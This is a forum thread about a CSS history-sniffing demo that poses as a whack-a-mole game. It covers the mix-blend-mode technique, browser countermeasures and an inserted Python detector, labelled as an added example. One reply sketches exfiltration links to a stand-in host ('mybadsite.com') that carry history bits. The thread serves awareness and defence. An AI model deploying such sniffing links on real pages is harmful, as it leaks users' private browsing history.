Clever hack can trick Web surfers into revealing their browsing history



This is a couple of years old, so apologies if it's already been discussed; but I just ran across this last night.

(BTW, this doesn't work in IE, or in Edge - yet - but works in Chrome, other Chromium derivatives like Opera, and FF and its derivatives.)

This demo appears at first to be a "whack-a-mole" game: you're supposed to click the "mole" as quickly as possible. But try it: when you click the "mole," it will pop up a list of these nine Web pages:

https://www.cnn.com
https://news.ycombinator.com
https://www.reddit.com
https://www.amazon.com
https://twitter.com/lcamtuf
https://www.donaldjtrump.com
https://www.farmersonly.com
https://www.diapers.com

... and will tell you which ones you've visited!

How it works: rather than being random, the mole's position depends on which combination of the above Web sites you've visited. Since there are nine Web sites, there are 2^9 or 512 possible visited/not visited combinations. So the demo actually shows 512 moles, one for each possible combination, and uses CSS "mix blend modes" to ensure only one mole is visible: the one that corresponds to your particular browsing history. Read the author's blog post for more details.

Note that although this demo uses JavaScript to reveal the results, collecting the info only required HTML, CSS, and a means to convince you to click the right spot on the page, so add-ons like NoScript won't protect you. If this were a truly deceptive web page, you could imagine revealing whether you've visited any of hundreds of Web sites by playing the "game" (or by clicking apparently innocuous links or buttons at the deceptive Web site) for a few minutes.

Countermeasures and Mitigations

There are a couple of obvious countermeasures, but you'd have to give up some functionality. You could just disable flagging visited links: in FF, toggle layout.css.visited_links_enabled in about:config to "false." In the demo, the mole will now always appear in the "no links visited" position.

Or you could give up mix blend mode instead: again in FF, toggle layout.css.mix-blend-mode.enabled to "false." This disables the "game:" the "mole" is gone, replaced with a white rectangle; but I'd wager that 99% of legit Web sites wouldn't be significantly affected. (A few might display slightly "funny" but should work OK. Besides, they'd look that way under IE/Edge anyhow, unless they have IE/Edge-specific coding, and in that case, an IE-like SSUAO is all you'd need to fix the site.)

Finally, there's a weakness in this method that makes it a bit less revealing than you might think. When I first tried it, I was surprised to learn that I hadn't visited any of the above Web sites, even though I know I at least visit amazon.com rather often. But it didn't show as "visited" because I use a bookmark to go to amazon.com, which actually goes to https://www.amazon.com/?.... Since the demo page couldn't guess the entire long string, my browser didn't show https://www.amazon.com by itself as "visited." So maybe the best mitigation is just to append a ? and some extra random garbage to all your bookmarks!
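One defensive use of what this post describes, as an added example that is not part of the thread or of the demo itself: a small Python heuristic that flags a stylesheet pairing ":visited" rules with mix-blend-mode, the combination the demo relies on to turn a colour difference into a visible/invisible "mole". The two sample stylesheets are constructed for the example.

```python
import re
from typing import Dict, List

# Constructed sample stylesheets (not taken from the demo). The first mirrors
# the post's description: a :visited colour difference plus mix-blend-mode so
# that only one "mole" survives compositing. The second is ordinary link styling.
SNIFFING_CSS = """
a.probe:link    { color: #000000; }
a.probe:visited { color: #ffffff; }
.mole { mix-blend-mode: multiply; position: absolute; }
"""
BENIGN_CSS = """
nav a:link    { color: #06c; }
nav a:visited { color: purple; }
"""

RULE_RE = re.compile(r"([^{}]+)\{([^}]*)\}", re.S)


def parse_rules(css: str) -> List[dict]:
    """Flatten a stylesheet into {selector, props} records.
    Deliberately simple: no @media/@supports nesting, no braces inside strings."""
    rules = []
    for selector, body in RULE_RE.findall(css):
        props = {}
        for decl in body.split(";"):
            if ":" in decl:
                name, value = decl.split(":", 1)
                props[name.strip().lower()] = value.strip()
        rules.append({"selector": " ".join(selector.split()), "props": props})
    return rules


def assess_history_sniffing(css: str) -> Dict[str, object]:
    """Heuristic from the thread: :visited on its own may only change colours,
    so the demo needs mix-blend-mode to turn that colour difference into
    geometry. Both in one stylesheet is the signal worth a closer look."""
    rules = parse_rules(css)
    visited = [r for r in rules if ":visited" in r["selector"].lower()]
    blended = [r for r in rules if "mix-blend-mode" in r["props"]]
    return {
        "visited_selectors": [r["selector"] for r in visited],
        "blend_selectors": [r["selector"] for r in blended],
        "suspicious": bool(visited) and bool(blended),
    }


if __name__ == "__main__":
    for name, css in (("sniffing", SNIFFING_CSS), ("benign", BENIGN_CSS)):
        print(name, assess_history_sniffing(css))
```

Plenty of legitimate sites style :visited links, so the flag is a review prompt, not a verdict; it mirrors the post's observation that giving up mix-blend-mode breaks the demo while leaving most sites usable.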



The problem is that this demo displays data only locally, no request is sent back.

And if it was, I'd assume it could have been blocked by a specific rule in uBlock, as it is already nicely recognized as an inline script.


The demo is designed just to show what's possible; it's not designed to actually steal your browsing history! So of course no request is sent back.

6 hours ago, Mathwiz said:

... although this demo uses JavaScript to reveal the results, collecting the info only required HTML, CSS, and a means to convince you to click the right spot on the page, so add-ons like NoScript won't protect you.

IOW, the "moles" could've been 512 simple links, from ...

<a href="http://mybadsite.com/?user=victim1&amp;historyBits=000">...</a>
         ... through ...
<a href="http://mybadsite.com/?user=victim1&amp;historyBits=511">...</a>

... so when you click one, the server just collects your data and goes to the next page.

And the demo runs fine with all of uBO's filters enabled. There's really nothing for uBO to block; that's what makes it potentially dangerous.


Sure, no harm's done :)

The only problem I see is that in the spying advertising industry, changes are quick. If this technique has great potential, it would already have been used by tech companies to track users, and if this was true, tracker-blockers would have already prepared an update :)

After all, it's worth knowing, but no reason to panic.
